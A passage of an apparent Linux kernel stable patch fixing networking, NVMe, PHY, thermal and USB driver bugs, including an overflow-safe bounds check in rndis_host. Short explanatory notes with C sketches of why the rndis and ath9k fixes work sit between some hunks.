+-				      &hw_dump_size_bytes);
++				      &hw_dump_size_bytes,
++				      false);
+ 	if (status != DBG_STATUS_OK)
+ 		return 0;
+ 
+@@ -3397,7 +3402,9 @@ static u32 qed_grc_dump_mcp_hw_dump(struct qed_hwfn *p_hwfn,
+ 		status = qed_nvram_read(p_hwfn,
+ 					p_ptt,
+ 					hw_dump_offset_bytes,
+-					hw_dump_size_bytes, dump_buf + offset);
++					hw_dump_size_bytes,
++					dump_buf + offset,
++					false);
+ 		if (status != DBG_STATUS_OK) {
+ 			DP_NOTICE(p_hwfn,
+ 				  "Failed to read MCP HW Dump image from NVRAM\n");
+@@ -4123,7 +4130,9 @@ static enum dbg_status qed_mcp_trace_get_meta_info(struct qed_hwfn *p_hwfn,
+ 	return qed_find_nvram_image(p_hwfn,
+ 				    p_ptt,
+ 				    nvram_image_type,
+-				    trace_meta_offset, trace_meta_size);
++				    trace_meta_offset,
++				    trace_meta_size,
++				    true);
+ }
+ 
+ /* Reads the MCP Trace meta data from NVRAM into the specified buffer */
+@@ -4139,7 +4148,10 @@ static enum dbg_status qed_mcp_trace_read_meta(struct qed_hwfn *p_hwfn,
+ 	/* Read meta data from NVRAM */
+ 	status = qed_nvram_read(p_hwfn,
+ 				p_ptt,
+-				nvram_offset_in_bytes, size_in_bytes, buf);
++				nvram_offset_in_bytes,
++				size_in_bytes,
++				buf,
++				true);
+ 	if (status != DBG_STATUS_OK)
+ 		return status;
+ 
+diff --git a/drivers/net/ethernet/qlogic/qlcnic/qlcnic_83xx_init.c b/drivers/net/ethernet/qlogic/qlcnic/qlcnic_83xx_init.c
+index dbb800769cb63..c95d56e56c59a 100644
+--- a/drivers/net/ethernet/qlogic/qlcnic/qlcnic_83xx_init.c
++++ b/drivers/net/ethernet/qlogic/qlcnic/qlcnic_83xx_init.c
+@@ -2505,7 +2505,13 @@ int qlcnic_83xx_init(struct qlcnic_adapter *adapter)
+ 		goto disable_mbx_intr;
+ 
+ 	qlcnic_83xx_clear_function_resources(adapter);
+-	qlcnic_dcb_enable(adapter->dcb);
++
++	err = qlcnic_dcb_enable(adapter->dcb);
++	if (err) {
++		qlcnic_dcb_free(adapter->dcb);
++		goto disable_mbx_intr;
++	}
++
+ 	qlcnic_83xx_initialize_nic(adapter, 1);
+ 	qlcnic_dcb_get_info(adapter->dcb);
+ 
+diff --git a/drivers/net/ethernet/qlogic/qlcnic/qlcnic_dcb.h b/drivers/net/ethernet/qlogic/qlcnic/qlcnic_dcb.h
+index 7519773eaca6e..22afa2be85fdb 100644
+--- a/drivers/net/ethernet/qlogic/qlcnic/qlcnic_dcb.h
++++ b/drivers/net/ethernet/qlogic/qlcnic/qlcnic_dcb.h
+@@ -41,11 +41,6 @@ struct qlcnic_dcb {
+ 	unsigned long			state;
+ };
+ 
+-static inline void qlcnic_clear_dcb_ops(struct qlcnic_dcb *dcb)
+-{
+-	kfree(dcb);
+-}
+-
+ static inline int qlcnic_dcb_get_hw_capability(struct qlcnic_dcb *dcb)
+ {
+ 	if (dcb && dcb->ops->get_hw_capability)
+@@ -112,9 +107,8 @@ static inline void qlcnic_dcb_init_dcbnl_ops(struct qlcnic_dcb *dcb)
+ 		dcb->ops->init_dcbnl_ops(dcb);
+ }
+ 
+-static inline void qlcnic_dcb_enable(struct qlcnic_dcb *dcb)
++static inline int qlcnic_dcb_enable(struct qlcnic_dcb *dcb)
+ {
+-	if (dcb && qlcnic_dcb_attach(dcb))
+-		qlcnic_clear_dcb_ops(dcb);
++	return dcb ? qlcnic_dcb_attach(dcb) : 0;
+ }
+ #endif
+diff --git a/drivers/net/ethernet/qlogic/qlcnic/qlcnic_main.c b/drivers/net/ethernet/qlogic/qlcnic/qlcnic_main.c
+index 28476b982bab6..44dac3c0908eb 100644
+--- a/drivers/net/ethernet/qlogic/qlcnic/qlcnic_main.c
++++ b/drivers/net/ethernet/qlogic/qlcnic/qlcnic_main.c
+@@ -2599,7 +2599,13 @@ qlcnic_probe(struct pci_dev *pdev, const struct pci_device_id *ent)
+ 			 "Device does not support MSI interrupts\n");
+ 
+ 	if (qlcnic_82xx_check(adapter)) {
+-		qlcnic_dcb_enable(adapter->dcb);
++		err = qlcnic_dcb_enable(adapter->dcb);
++		if (err) {
++			qlcnic_dcb_free(adapter->dcb);
++			dev_err(&pdev->dev, "Failed to enable DCB\n");
++			goto err_out_free_hw;
++		}
++
+ 		qlcnic_dcb_get_info(adapter->dcb);
+ 		err = qlcnic_setup_intr(adapter);
+ 
+diff --git a/drivers/net/phy/xilinx_gmii2rgmii.c b/drivers/net/phy/xilinx_gmii2rgmii.c
+index 8dcb49ed1f3d9..7fd9fe6a602bc 100644
+--- a/drivers/net/phy/xilinx_gmii2rgmii.c
++++ b/drivers/net/phy/xilinx_gmii2rgmii.c
+@@ -105,6 +105,7 @@ static int xgmiitorgmii_probe(struct mdio_device *mdiodev)
+ 
+ 	if (!priv->phy_dev->drv) {
+ 		dev_info(dev, "Attached phy not ready\n");
++		put_device(&priv->phy_dev->mdio.dev);
+ 		return -EPROBE_DEFER;
+ 	}
+ 
+diff --git a/drivers/net/usb/rndis_host.c b/drivers/net/usb/rndis_host.c
+index f79333fe17836..7b3739b29c8f7 100644
+--- a/drivers/net/usb/rndis_host.c
++++ b/drivers/net/usb/rndis_host.c
+@@ -255,7 +255,8 @@ static int rndis_query(struct usbnet *dev, struct usb_interface *intf,
+ 
+ 	off = le32_to_cpu(u.get_c->offset);
+ 	len = le32_to_cpu(u.get_c->len);
+-	if (unlikely((8 + off + len) > CONTROL_BUFFER_SIZE))
++	if (unlikely((off > CONTROL_BUFFER_SIZE - 8) ||
++		     (len > CONTROL_BUFFER_SIZE - 8 - off)))
+ 		goto response_error;
+ 
+ 	if (*reply_len != -1 && len != *reply_len)
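
The rndis_host hunk above replaces an additive bounds check with subtractive comparisons. With 32-bit unsigned `off` and `len` supplied by the device, `8 + off + len` can wrap past UINT32_MAX and slip under the limit; subtracting from the buffer size cannot wrap. A standalone sketch, assuming the driver's 1025-byte control buffer:

#include <stdint.h>
#include <stdio.h>

#define CONTROL_BUFFER_SIZE 1025u

/* The additive form can wrap around UINT32_MAX and accept a hostile
 * offset/length pair; the subtractive form cannot. This is a sketch,
 * not the driver's actual buffer handling. */
static int reject_additive(uint32_t off, uint32_t len)
{
	return (8 + off + len) > CONTROL_BUFFER_SIZE;
}

static int reject_subtractive(uint32_t off, uint32_t len)
{
	return off > CONTROL_BUFFER_SIZE - 8 ||
	       len > CONTROL_BUFFER_SIZE - 8 - off;
}

int main(void)
{
	uint32_t off = 8, len = UINT32_MAX - 10;	/* crafted values */

	printf("additive rejects:    %d\n", reject_additive(off, len));    /* 0 - sum wrapped */
	printf("subtractive rejects: %d\n", reject_subtractive(off, len)); /* 1 - caught */
	return 0;
}
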
+diff --git a/drivers/net/veth.c b/drivers/net/veth.c
+index 09682ea3354e9..bd385ccd0d18d 100644
+--- a/drivers/net/veth.c
++++ b/drivers/net/veth.c
+@@ -974,6 +974,9 @@ static int veth_poll(struct napi_struct *napi, int budget)
+ 	xdp_set_return_frame_no_direct();
+ 	done = veth_xdp_rcv(rq, budget, &bq, &stats);
+ 
++	if (stats.xdp_redirect > 0)
++		xdp_do_flush();
++
+ 	if (done < budget && napi_complete_done(napi, done)) {
+ 		/* Write rx_notify_masked before reading ptr_ring */
+ 		smp_store_mb(rq->rx_notify_masked, false);
+@@ -987,8 +990,6 @@ static int veth_poll(struct napi_struct *napi, int budget)
+ 
+ 	if (stats.xdp_tx > 0)
+ 		veth_xdp_flush(rq, &bq);
+-	if (stats.xdp_redirect > 0)
+-		xdp_do_flush();
+ 	xdp_clear_return_frame_no_direct();
+ 
+ 	return done;
+diff --git a/drivers/net/vmxnet3/vmxnet3_drv.c b/drivers/net/vmxnet3/vmxnet3_drv.c
+index 6f1e560fb15c4..56267c327f0b7 100644
+--- a/drivers/net/vmxnet3/vmxnet3_drv.c
++++ b/drivers/net/vmxnet3/vmxnet3_drv.c
+@@ -1288,6 +1288,10 @@ vmxnet3_rx_csum(struct vmxnet3_adapter *adapter,
+ 		    (le32_to_cpu(gdesc->dword[3]) &
+ 		     VMXNET3_RCD_CSUM_OK) == VMXNET3_RCD_CSUM_OK) {
+ 			skb->ip_summed = CHECKSUM_UNNECESSARY;
++			if ((le32_to_cpu(gdesc->dword[0]) &
++				     (1UL << VMXNET3_RCD_HDR_INNER_SHIFT))) {
++				skb->csum_level = 1;
++			}
+ 			WARN_ON_ONCE(!(gdesc->rcd.tcp || gdesc->rcd.udp) &&
+ 				     !(le32_to_cpu(gdesc->dword[0]) &
+ 				     (1UL << VMXNET3_RCD_HDR_INNER_SHIFT)));
+@@ -1297,6 +1301,10 @@ vmxnet3_rx_csum(struct vmxnet3_adapter *adapter,
+ 		} else if (gdesc->rcd.v6 && (le32_to_cpu(gdesc->dword[3]) &
+ 					     (1 << VMXNET3_RCD_TUC_SHIFT))) {
+ 			skb->ip_summed = CHECKSUM_UNNECESSARY;
++			if ((le32_to_cpu(gdesc->dword[0]) &
++				     (1UL << VMXNET3_RCD_HDR_INNER_SHIFT))) {
++				skb->csum_level = 1;
++			}
+ 			WARN_ON_ONCE(!(gdesc->rcd.tcp || gdesc->rcd.udp) &&
+ 				     !(le32_to_cpu(gdesc->dword[0]) &
+ 				     (1UL << VMXNET3_RCD_HDR_INNER_SHIFT)));
+diff --git a/drivers/net/vrf.c b/drivers/net/vrf.c
+index badf6f09ae51c..f6dcec66f0a4b 100644
+--- a/drivers/net/vrf.c
++++ b/drivers/net/vrf.c
+@@ -1385,8 +1385,8 @@ static struct sk_buff *vrf_ip6_rcv(struct net_device *vrf_dev,
+ 
+ 	/* loopback, multicast & non-ND link-local traffic; do not push through
+ 	 * packet taps again. Reset pkt_type for upper layers to process skb.
+-	 * For strict packets with a source LLA, determine the dst using the
+-	 * original ifindex.
++	 * For non-loopback strict packets, determine the dst using the original
++	 * ifindex.
+ 	 */
+ 	if (skb->pkt_type == PACKET_LOOPBACK || (need_strict && !is_ndisc)) {
+ 		skb->dev = vrf_dev;
+@@ -1395,7 +1395,7 @@ static struct sk_buff *vrf_ip6_rcv(struct net_device *vrf_dev,
+ 
+ 		if (skb->pkt_type == PACKET_LOOPBACK)
+ 			skb->pkt_type = PACKET_HOST;
+-		else if (ipv6_addr_type(&ipv6_hdr(skb)->saddr) & IPV6_ADDR_LINKLOCAL)
++		else
+ 			vrf_ip6_input_dst(skb, vrf_dev, orig_iif);
+ 
+ 		goto out;
+diff --git a/drivers/net/vxlan/vxlan_core.c b/drivers/net/vxlan/vxlan_core.c
+index 6ab669dcd1c6c..d4be39b19a6be 100644
+--- a/drivers/net/vxlan/vxlan_core.c
++++ b/drivers/net/vxlan/vxlan_core.c
+@@ -2917,16 +2917,23 @@ static int vxlan_init(struct net_device *dev)
+ 		vxlan_vnigroup_init(vxlan);
+ 
+ 	dev->tstats = netdev_alloc_pcpu_stats(struct pcpu_sw_netstats);
+-	if (!dev->tstats)
+-		return -ENOMEM;
++	if (!dev->tstats) {
++		err = -ENOMEM;
++		goto err_vnigroup_uninit;
++	}
+ 
+ 	err = gro_cells_init(&vxlan->gro_cells, dev);
+-	if (err) {
+-		free_percpu(dev->tstats);
+-		return err;
+-	}
++	if (err)
++		goto err_free_percpu;
+ 
+ 	return 0;
++
++err_free_percpu:
++	free_percpu(dev->tstats);
++err_vnigroup_uninit:
++	if (vxlan->cfg.flags & VXLAN_F_VNIFILTER)
++		vxlan_vnigroup_uninit(vxlan);
++	return err;
+ }
+ 
+ static void vxlan_fdb_delete_default(struct vxlan_dev *vxlan, __be32 vni)
+diff --git a/drivers/net/wireless/ath/ath11k/qmi.c b/drivers/net/wireless/ath/ath11k/qmi.c
+index 8358fe08c2344..7cc5fa3251521 100644
+--- a/drivers/net/wireless/ath/ath11k/qmi.c
++++ b/drivers/net/wireless/ath/ath11k/qmi.c
+@@ -19,6 +19,7 @@
+ #define SLEEP_CLOCK_SELECT_INTERNAL_BIT	0x02
+ #define HOST_CSTATE_BIT			0x04
+ #define PLATFORM_CAP_PCIE_GLOBAL_RESET	0x08
++#define PLATFORM_CAP_PCIE_PME_D3COLD	0x10
+ 
+ #define FW_BUILD_ID_MASK "QC_IMAGE_VERSION_STRING="
+ 
+@@ -1752,6 +1753,8 @@ static int ath11k_qmi_host_cap_send(struct ath11k_base *ab)
+ 	if (ab->hw_params.global_reset)
+ 		req.nm_modem |= PLATFORM_CAP_PCIE_GLOBAL_RESET;
+ 
++	req.nm_modem |= PLATFORM_CAP_PCIE_PME_D3COLD;
++
+ 	ath11k_dbg(ab, ATH11K_DBG_QMI, "qmi host cap request\n");
+ 
+ 	ret = qmi_txn_init(&ab->qmi.handle, &txn,
+diff --git a/drivers/net/wireless/ath/ath9k/htc.h b/drivers/net/wireless/ath/ath9k/htc.h
+index 30f0765fb9fd8..237f4ec2cffd7 100644
+--- a/drivers/net/wireless/ath/ath9k/htc.h
++++ b/drivers/net/wireless/ath/ath9k/htc.h
+@@ -327,9 +327,9 @@ static inline struct ath9k_htc_tx_ctl *HTC_SKB_CB(struct sk_buff *skb)
+ }
+ 
+ #ifdef CONFIG_ATH9K_HTC_DEBUGFS
+-#define __STAT_SAFE(hif_dev, expr)	((hif_dev)->htc_handle->drv_priv ? (expr) : 0)
+-#define CAB_STAT_INC(priv)		((priv)->debug.tx_stats.cab_queued++)
+-#define TX_QSTAT_INC(priv, q)		((priv)->debug.tx_stats.queue_stats[q]++)
++#define __STAT_SAFE(hif_dev, expr)	do { ((hif_dev)->htc_handle->drv_priv ? (expr) : 0); } while (0)
++#define CAB_STAT_INC(priv)		do { ((priv)->debug.tx_stats.cab_queued++); } while (0)
++#define TX_QSTAT_INC(priv, q)		do { ((priv)->debug.tx_stats.queue_stats[q]++); } while (0)
+ 
+ #define TX_STAT_INC(hif_dev, c) \
+ 		__STAT_SAFE((hif_dev), (hif_dev)->htc_handle->drv_priv->debug.tx_stats.c++)
+@@ -378,10 +378,10 @@ void ath9k_htc_get_et_stats(struct ieee80211_hw *hw,
+ 			    struct ethtool_stats *stats, u64 *data);
+ #else
+ 
+-#define TX_STAT_INC(hif_dev, c)
+-#define TX_STAT_ADD(hif_dev, c, a)
+-#define RX_STAT_INC(hif_dev, c)
+-#define RX_STAT_ADD(hif_dev, c, a)
++#define TX_STAT_INC(hif_dev, c)		do { } while (0)
++#define TX_STAT_ADD(hif_dev, c, a)	do { } while (0)
++#define RX_STAT_INC(hif_dev, c)		do { } while (0)
++#define RX_STAT_ADD(hif_dev, c, a)	do { } while (0)
+ 
+ #define CAB_STAT_INC(priv)
+ #define TX_QSTAT_INC(priv, c)
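
The ath9k change above converts statement-like macros to the `do { } while (0)` idiom. A macro that expands to a bare expression plus `;` silently terminates an unbraced `if`, orphaning any following `else`; the do-while form behaves as a single statement. Illustrative macros, not the driver's:

#include <stdio.h>

/* The expression form ends the if-statement with its own ';', so the
 * else below would no longer parse; the do-while form is safe. */
#define STAT_INC_BAD(c)		(c)++;
#define STAT_INC_GOOD(c)	do { (c)++; } while (0)

int main(void)
{
	int queued = 0, dropped = 0;
	int ok = 1;

	if (ok)
		STAT_INC_GOOD(queued);	/* with STAT_INC_BAD: compile error */
	else
		dropped++;

	printf("queued=%d dropped=%d\n", queued, dropped);
	return 0;
}
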
+diff --git a/drivers/nvme/host/core.c b/drivers/nvme/host/core.c
+index 108b5022ceadc..1ded96d1bfd21 100644
+--- a/drivers/nvme/host/core.c
++++ b/drivers/nvme/host/core.c
+@@ -1069,6 +1069,18 @@ static u32 nvme_known_admin_effects(u8 opcode)
+ 	return 0;
+ }
+ 
++static u32 nvme_known_nvm_effects(u8 opcode)
++{
++	switch (opcode) {
++	case nvme_cmd_write:
++	case nvme_cmd_write_zeroes:
++	case nvme_cmd_write_uncor:
++		return NVME_CMD_EFFECTS_LBCC;
++	default:
++		return 0;
++	}
++}
++
+ u32 nvme_command_effects(struct nvme_ctrl *ctrl, struct nvme_ns *ns, u8 opcode)
+ {
+ 	u32 effects = 0;
+@@ -1076,16 +1088,24 @@ u32 nvme_command_effects(struct nvme_ctrl *ctrl, struct nvme_ns *ns, u8 opcode)
+ 	if (ns) {
+ 		if (ns->head->effects)
+ 			effects = le32_to_cpu(ns->head->effects->iocs[opcode]);
++		if (ns->head->ids.csi == NVME_CAP_CSS_NVM)
++			effects |= nvme_known_nvm_effects(opcode);
+ 		if (effects & ~(NVME_CMD_EFFECTS_CSUPP | NVME_CMD_EFFECTS_LBCC))
+ 			dev_warn_once(ctrl->device,
+-				"IO command:%02x has unhandled effects:%08x\n",
++				"IO command:%02x has unusual effects:%08x\n",
+ 				opcode, effects);
+-		return 0;
+-	}
+ 
+-	if (ctrl->effects)
+-		effects = le32_to_cpu(ctrl->effects->acs[opcode]);
+-	effects |= nvme_known_admin_effects(opcode);
++		/*
++		 * NVME_CMD_EFFECTS_CSE_MASK causes a freeze of all I/O queues,
++		 * which would deadlock when done on an I/O command.  Note that
++		 * we already warn about an unusual effect above.
++		 */
++		effects &= ~NVME_CMD_EFFECTS_CSE_MASK;
++	} else {
++		if (ctrl->effects)
++			effects = le32_to_cpu(ctrl->effects->acs[opcode]);
++		effects |= nvme_known_admin_effects(opcode);
++	}
+ 
+ 	return effects;
+ }
+diff --git a/drivers/nvme/host/nvme.h b/drivers/nvme/host/nvme.h
+index 8a0db9e06dc65..cbda8a19409bf 100644
+--- a/drivers/nvme/host/nvme.h
++++ b/drivers/nvme/host/nvme.h
+@@ -888,7 +888,7 @@ static inline void nvme_trace_bio_complete(struct request *req)
+ {
+ 	struct nvme_ns *ns = req->q->queuedata;
+ 
+-	if (req->cmd_flags & REQ_NVME_MPATH)
++	if ((req->cmd_flags & REQ_NVME_MPATH) && req->bio)
+ 		trace_block_bio_complete(ns->head->disk->queue, req->bio);
+ }
+ 
+diff --git a/drivers/nvme/target/admin-cmd.c b/drivers/nvme/target/admin-cmd.c
+index c8a061ce3ee56..76ceaadd6eeaf 100644
+--- a/drivers/nvme/target/admin-cmd.c
++++ b/drivers/nvme/target/admin-cmd.c
+@@ -164,26 +164,29 @@ out:
+ 
+ static void nvmet_get_cmd_effects_nvm(struct nvme_effects_log *log)
+ {
+-	log->acs[nvme_admin_get_log_page]	= cpu_to_le32(1 << 0);
+-	log->acs[nvme_admin_identify]		= cpu_to_le32(1 << 0);
+-	log->acs[nvme_admin_abort_cmd]		= cpu_to_le32(1 << 0);
+-	log->acs[nvme_admin_set_features]	= cpu_to_le32(1 << 0);
+-	log->acs[nvme_admin_get_features]	= cpu_to_le32(1 << 0);
+-	log->acs[nvme_admin_async_event]	= cpu_to_le32(1 << 0);
+-	log->acs[nvme_admin_keep_alive]		= cpu_to_le32(1 << 0);
+-
+-	log->iocs[nvme_cmd_read]		= cpu_to_le32(1 << 0);
+-	log->iocs[nvme_cmd_write]		= cpu_to_le32(1 << 0);
+-	log->iocs[nvme_cmd_flush]		= cpu_to_le32(1 << 0);
+-	log->iocs[nvme_cmd_dsm]			= cpu_to_le32(1 << 0);
+-	log->iocs[nvme_cmd_write_zeroes]	= cpu_to_le32(1 << 0);
++	log->acs[nvme_admin_get_log_page] =
++	log->acs[nvme_admin_identify] =
++	log->acs[nvme_admin_abort_cmd] =
++	log->acs[nvme_admin_set_features] =
++	log->acs[nvme_admin_get_features] =
++	log->acs[nvme_admin_async_event] =
++	log->acs[nvme_admin_keep_alive] =
++		cpu_to_le32(NVME_CMD_EFFECTS_CSUPP);
++
++	log->iocs[nvme_cmd_read] =
++	log->iocs[nvme_cmd_write] =
++	log->iocs[nvme_cmd_flush] =
++	log->iocs[nvme_cmd_dsm]	=
++	log->iocs[nvme_cmd_write_zeroes] =
++		cpu_to_le32(NVME_CMD_EFFECTS_CSUPP);
+ }
+ 
+ static void nvmet_get_cmd_effects_zns(struct nvme_effects_log *log)
+ {
+-	log->iocs[nvme_cmd_zone_append]		= cpu_to_le32(1 << 0);
+-	log->iocs[nvme_cmd_zone_mgmt_send]	= cpu_to_le32(1 << 0);
+-	log->iocs[nvme_cmd_zone_mgmt_recv]	= cpu_to_le32(1 << 0);
++	log->iocs[nvme_cmd_zone_append] =
++	log->iocs[nvme_cmd_zone_mgmt_send] =
++	log->iocs[nvme_cmd_zone_mgmt_recv] =
++		cpu_to_le32(NVME_CMD_EFFECTS_CSUPP);
+ }
+ 
+ static void nvmet_execute_get_log_cmd_effects_ns(struct nvmet_req *req)
+diff --git a/drivers/of/fdt.c b/drivers/of/fdt.c
+index 7b571a6316397..4f88e8bbdd279 100644
+--- a/drivers/of/fdt.c
++++ b/drivers/of/fdt.c
+@@ -1099,7 +1099,7 @@ u64 __init dt_mem_next_cell(int s, const __be32 **cellp)
+  */
+ int __init early_init_dt_scan_memory(void)
+ {
+-	int node;
++	int node, found_memory = 0;
+ 	const void *fdt = initial_boot_params;
+ 
+ 	fdt_for_each_subnode(node, fdt, 0) {
+@@ -1139,6 +1139,8 @@ int __init early_init_dt_scan_memory(void)
+ 
+ 			early_init_dt_add_memory_arch(base, size);
+ 
++			found_memory = 1;
++
+ 			if (!hotpluggable)
+ 				continue;
+ 
+@@ -1147,7 +1149,7 @@ int __init early_init_dt_scan_memory(void)
+ 					base, base + size);
+ 		}
+ 	}
+-	return 0;
++	return found_memory;
+ }
+ 
+ int __init early_init_dt_scan_chosen(char *cmdline)
+diff --git a/drivers/phy/qualcomm/phy-qcom-qmp-combo.c b/drivers/phy/qualcomm/phy-qcom-qmp-combo.c
+index 91f8ee79000df..adcda7762acf5 100644
+--- a/drivers/phy/qualcomm/phy-qcom-qmp-combo.c
++++ b/drivers/phy/qualcomm/phy-qcom-qmp-combo.c
+@@ -955,6 +955,7 @@ struct qcom_qmp {
+ 	struct regulator_bulk_data *vregs;
+ 
+ 	struct qmp_phy **phys;
++	struct qmp_phy *usb_phy;
+ 
+ 	struct mutex phy_mutex;
+ 	int init_count;
+@@ -1978,7 +1979,7 @@ static int qmp_combo_com_init(struct qmp_phy *qphy)
+ {
+ 	struct qcom_qmp *qmp = qphy->qmp;
+ 	const struct qmp_phy_cfg *cfg = qphy->cfg;
+-	void __iomem *pcs = qphy->pcs;
++	struct qmp_phy *usb_phy = qmp->usb_phy;
+ 	void __iomem *dp_com = qmp->dp_com;
+ 	int ret;
+ 
+@@ -2031,13 +2032,13 @@ static int qmp_combo_com_init(struct qmp_phy *qphy)
+ 	qphy_clrbits(dp_com, QPHY_V3_DP_COM_SWI_CTRL, 0x03);
+ 	qphy_clrbits(dp_com, QPHY_V3_DP_COM_SW_RESET, SW_RESET);
+ 
+-	if (cfg->regs[QPHY_PCS_POWER_DOWN_CONTROL])
+-		qphy_setbits(pcs,
+-				cfg->regs[QPHY_PCS_POWER_DOWN_CONTROL],
+-				cfg->pwrdn_ctrl);
++	if (usb_phy->cfg->regs[QPHY_PCS_POWER_DOWN_CONTROL])
++		qphy_setbits(usb_phy->pcs,
++				usb_phy->cfg->regs[QPHY_PCS_POWER_DOWN_CONTROL],
++				usb_phy->cfg->pwrdn_ctrl);
+ 	else
+-		qphy_setbits(pcs, QPHY_V2_PCS_POWER_DOWN_CONTROL,
+-				cfg->pwrdn_ctrl);
++		qphy_setbits(usb_phy->pcs, QPHY_V2_PCS_POWER_DOWN_CONTROL,
++				usb_phy->cfg->pwrdn_ctrl);
+ 
+ 	mutex_unlock(&qmp->phy_mutex);
+ 
+@@ -2925,6 +2926,8 @@ static int qmp_combo_probe(struct platform_device *pdev)
+ 				goto err_node_put;
+ 			}
+ 
++			qmp->usb_phy = qmp->phys[id];
++
+ 			/*
+ 			 * Register the pipe clock provided by phy.
+ 			 * See function description to see details of this pipe clock.
+@@ -2940,6 +2943,9 @@ static int qmp_combo_probe(struct platform_device *pdev)
+ 		id++;
+ 	}
+ 
++	if (!qmp->usb_phy)
++		return -EINVAL;
++
+ 	phy_provider = devm_of_phy_provider_register(dev, of_phy_simple_xlate);
+ 
+ 	return PTR_ERR_OR_ZERO(phy_provider);
+diff --git a/drivers/thermal/intel/int340x_thermal/processor_thermal_rfim.c b/drivers/thermal/intel/int340x_thermal/processor_thermal_rfim.c
+index 8c42e76620333..92ed1213fe379 100644
+--- a/drivers/thermal/intel/int340x_thermal/processor_thermal_rfim.c
++++ b/drivers/thermal/intel/int340x_thermal/processor_thermal_rfim.c
+@@ -172,6 +172,7 @@ static const struct attribute_group fivr_attribute_group = {
+ RFIM_SHOW(rfi_restriction_run_busy, 1)
+ RFIM_SHOW(rfi_restriction_err_code, 1)
+ RFIM_SHOW(rfi_restriction_data_rate, 1)
++RFIM_SHOW(rfi_restriction_data_rate_base, 1)
+ RFIM_SHOW(ddr_data_rate_point_0, 1)
+ RFIM_SHOW(ddr_data_rate_point_1, 1)
+ RFIM_SHOW(ddr_data_rate_point_2, 1)
+@@ -181,11 +182,13 @@ RFIM_SHOW(rfi_disable, 1)
+ RFIM_STORE(rfi_restriction_run_busy, 1)
+ RFIM_STORE(rfi_restriction_err_code, 1)
+ RFIM_STORE(rfi_restriction_data_rate, 1)
++RFIM_STORE(rfi_restriction_data_rate_base, 1)
+ RFIM_STORE(rfi_disable, 1)
+ 
+ static DEVICE_ATTR_RW(rfi_restriction_run_busy);
+ static DEVICE_ATTR_RW(rfi_restriction_err_code);
+ static DEVICE_ATTR_RW(rfi_restriction_data_rate);
++static DEVICE_ATTR_RW(rfi_restriction_data_rate_base);
+ static DEVICE_ATTR_RO(ddr_data_rate_point_0);
+ static DEVICE_ATTR_RO(ddr_data_rate_point_1);
+ static DEVICE_ATTR_RO(ddr_data_rate_point_2);
+@@ -248,6 +251,7 @@ static struct attribute *dvfs_attrs[] = {
+ 	&dev_attr_rfi_restriction_run_busy.attr,
+ 	&dev_attr_rfi_restriction_err_code.attr,
+ 	&dev_attr_rfi_restriction_data_rate.attr,
++	&dev_attr_rfi_restriction_data_rate_base.attr,
+ 	&dev_attr_ddr_data_rate_point_0.attr,
+ 	&dev_attr_ddr_data_rate_point_1.attr,
+ 	&dev_attr_ddr_data_rate_point_2.attr,
+diff --git a/drivers/usb/dwc3/dwc3-xilinx.c b/drivers/usb/dwc3/dwc3-xilinx.c
+index 8607d4c23283c..0745e9f11b2ef 100644
+--- a/drivers/usb/dwc3/dwc3-xilinx.c
++++ b/drivers/usb/dwc3/dwc3-xilinx.c
+@@ -13,6 +13,7 @@
+ #include <linux/of.h>
+ #include <linux/platform_device.h>
+ #include <linux/dma-mapping.h>
++#include <linux/gpio/consumer.h>
+ #include <linux/of_gpio.h>
+ #include <linux/of_platform.h>
+ #include <linux/pm_runtime.h>
+diff --git a/drivers/usb/dwc3/gadget.c b/drivers/usb/dwc3/gadget.c
+index 6d524fa764438..ed958da0e1c96 100644
+--- a/drivers/usb/dwc3/gadget.c
++++ b/drivers/usb/dwc3/gadget.c
+@@ -1717,6 +1717,7 @@ static int __dwc3_stop_active_transfer(struct dwc3_ep *dep, bool force, bool int
+ 	else if (!ret)
+ 		dep->flags |= DWC3_EP_END_TRANSFER_PENDING;
+ 
++	dep->flags &= ~DWC3_EP_DELAY_STOP;
+ 	return ret;
+ }
+ 
+@@ -3722,8 +3723,10 @@ void dwc3_stop_active_transfer(struct dwc3_ep *dep, bool force,
+ 	if (dep->number <= 1 && dwc->ep0state != EP0_DATA_PHASE)
+ 		return;
+ 
++	if (interrupt && (dep->flags & DWC3_EP_DELAY_STOP))
++		return;
++
+ 	if (!(dep->flags & DWC3_EP_TRANSFER_STARTED) ||
+-	    (dep->flags & DWC3_EP_DELAY_STOP) ||
+ 	    (dep->flags & DWC3_EP_END_TRANSFER_PENDING))
+ 		return;
+ 
+diff --git a/drivers/vdpa/mlx5/net/mlx5_vnet.c b/drivers/vdpa/mlx5/net/mlx5_vnet.c
+index 90913365def43..444d6572b2d05 100644
+--- a/drivers/vdpa/mlx5/net/mlx5_vnet.c
++++ b/drivers/vdpa/mlx5/net/mlx5_vnet.c
+@@ -1468,11 +1468,13 @@ static int mlx5_vdpa_add_mac_vlan_rules(struct mlx5_vdpa_net *ndev, u8 *mac,
+ 	dmac_v = MLX5_ADDR_OF(fte_match_param, headers_v, outer_headers.dmac_47_16);
+ 	eth_broadcast_addr(dmac_c);
+ 	ether_addr_copy(dmac_v, mac);
+-	MLX5_SET(fte_match_set_lyr_2_4, headers_c, cvlan_tag, 1);
++	if (ndev->mvdev.actual_features & BIT_ULL(VIRTIO_NET_F_CTRL_VLAN)) {
++		MLX5_SET(fte_match_set_lyr_2_4, headers_c, cvlan_tag, 1);
++		MLX5_SET_TO_ONES(fte_match_set_lyr_2_4, headers_c, first_vid);
++	}
+ 	if (tagged) {
+ 		MLX5_SET(fte_match_set_lyr_2_4, headers_v, cvlan_tag, 1);
+-		MLX5_SET_TO_ONES(fte_match_set_lyr_2_4, headers_c, first_vid);
+-		MLX5_SET(fte_match_set_lyr_2_4, headers_c, first_vid, vid);
++		MLX5_SET(fte_match_set_lyr_2_4, headers_v, first_vid, vid);
+ 	}
+ 	flow_act.action = MLX5_FLOW_CONTEXT_ACTION_FWD_DEST;
+ 	dest.type = MLX5_FLOW_DESTINATION_TYPE_TIR;
+@@ -1684,7 +1686,7 @@ static virtio_net_ctrl_ack handle_ctrl_mac(struct mlx5_vdpa_dev *mvdev, u8 cmd)
+ 
+ 		/* Need recreate the flow table entry, so that the packet could forward back
+ 		 */
+-		mac_vlan_del(ndev, ndev->config.mac, 0, false);
++		mac_vlan_del(ndev, mac_back, 0, false);
+ 
+ 		if (mac_vlan_add(ndev, ndev->config.mac, 0, false)) {
+ 			mlx5_vdpa_warn(mvdev, "failed to insert forward rules, try to restore\n");
+diff --git a/drivers/vdpa/vdpa_sim/vdpa_sim.c b/drivers/vdpa/vdpa_sim/vdpa_sim.c
